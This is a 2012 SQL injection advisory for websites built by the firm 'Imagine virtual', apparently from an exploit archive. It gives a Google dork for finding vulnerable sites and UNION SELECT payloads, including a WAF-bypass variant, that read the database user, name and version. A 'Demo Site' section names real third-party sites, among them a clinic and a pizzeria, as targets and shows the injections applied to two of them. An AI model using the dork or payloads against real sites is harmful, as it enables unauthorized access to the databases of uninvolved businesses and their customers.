Imagine virtual SQL Injection Vulnerability

2012.12.16
Credit: Sys32
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"Design by imagine virtual\" inurl:\".php?id=\"

# '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # Imagine virtual Sql Injection Vulnerability # Google Dork: intext:"Design by imagine virtual" inurl:".php?id=" # Date: 15/12/2012 # Author: Sys32 # Email: tha.Sys32[at]gmail[dot]com # Vendor: http://www.imaginevirtual.com # Category: Webapp # Tested on: Backtrack 5 r3 # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # I. INFO. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # The application is vulnerable to sql injection, allowing an attacker to gain full access to the database. # Some injections need WAF bypass # # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # II. EXPLOIT. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # http://127.0.0.1/vull-page.php?id=[Sql-Injection] # # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # III. EXPLOIT Example. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # Injection: # # http://127.0.0.1/Vull-page.php?id=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- # # http://127.0.0.1/vull-page.php?id=-7' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+ # # Injection + WAF Bypass: # # http://127.0.0.1/Vull-page.php?id=-3 /*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- # # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # IV. Risk. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' # The security risk of the remote sql injection vulnerability is estimated as critical. # '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Demo Site: http://www.fotoXXraflores.com/loja.php?id=4 http://www.foXXiraflores.com/loja.php?id=4' //unable load properly http://www.incasadesign.com/quadros.php?id=204 http://www.incasadesign.com/quadros.php?id=204' //unable load properly http://www.pizzXXdozoo.com/produto.php?id=7 http://www.pizzXXozoo.com/produto.php?id=7' // error ! http://www.in-timeclinic.com/especialidade.php?id=13 http://www.in-timeclinic.com/especialidade.php?id=13' // error http://queXXnte.com/dynamic.php?id=15 http://qXXente.com/dynamic.php?id=15' //unable load properly http://www.peXXtauto.pt/auto.php?id=74 http://www.perXXauto.pt/auto.php?id=74' //unable load properly Demo Injection: http://www.pizzXXozoo.com/produto.php?id=-7' /*!20000union*/+/*!20000SelEct*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+ http://www.incXXXdesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

References:

http://www.imaginevirtual.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top